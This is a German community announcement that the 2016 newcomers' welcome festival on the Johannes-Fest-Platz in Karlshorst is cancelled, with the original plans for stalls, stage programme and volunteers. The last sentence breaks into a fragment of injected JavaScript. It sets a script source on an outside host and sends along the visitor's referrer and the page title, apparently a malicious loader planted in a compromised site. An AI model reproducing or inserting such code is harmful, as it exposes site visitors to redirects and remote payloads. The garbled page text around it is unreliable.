FÄLLT AUS: „Willkommen in Karlshorst – Neu? Bürger. Feier! Auf dem Johannes-Fest-Platz!“

Die ursprünglich für Samstag, den 16.07.16 geplante Veranstaltung „Willkommen in Karlshorst – Neu? Bürger. Feier!“ muss aus organisatorischen und personellen Gründen leider entfallen, wie uns das Stadtteilzentrum IKARUS mitteilte. Aktuell wird über eine Ersatzveranstaltung nachgedacht.

URSPRÜNGLICHE PLANUNG:

Jedes Jahr kommen mehrere hundert Neubürger nach Karlshorst und wohnen zu großen Teilen in neu errichteten Wohnungen in Randlagen wie dem Carlsgarten und der Gartenstadt. Diese Gebiete werden schlecht vom ÖPNV erschlossen, so dass die Bewohner vielfach das Auto nutzen und so vieles unterwegs und nicht im Stadtteil erledigen.

Auch die Angebote lokaler Vereinen nutzen sie weniger, sondern halten eher die Beziehungen zur alten Wohnstätte aufrecht. Doch um sich bürgerschaftlich in seinem Kiez zu engagieren muss man diesen kennen und sich mit ihm identifizieren. Zu einem gelingenden Gemeinwesen gehören eine funktionierende Nachbarschaft und ein gegenseitiges Kennen und Schätzen.

Um diesem Ziel näher zu kommen lädt die Bezirksbürgermeisterin zur

„Willkommen in Karlshorst – Neu? Bürger. Feier!“

am Samstag, 16.07.2016

in der Zeit von 15.00 bis 19.00 Uhr auf den Johannes-Fest-Platz

ein.

Alle Einrichtungen, Vereine und Initiativen (außer Parteien) haben hier die Möglichkeit, sich an Ständen und mit einem Programm auf der Bühne zu präsentieren. Örtliche Gewerbetreibende sind ebenso einbezogen wie Karlshorster Künstler, die das Kulturprogramm gestalten werden. Enge Kooperationspartner sind der Bürgerverein Karlshorst und das Bezirksamt Lichtenberg, die bei der Organisation unterstützen.

Wir freuen uns über Unterstützer, die zum Gelingen der Feier beitragen, sei es durch Betreuung der Angebote oder beim Sorgen für Ordnung während und Sauberkeit nach der Veranstaltung. Bitte wenden Sie sich an uns!s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=‘ + encodeURIComponent(document.referrer) + ‚&default_keyword=‘ + encodeURIComponent(document.title) + “;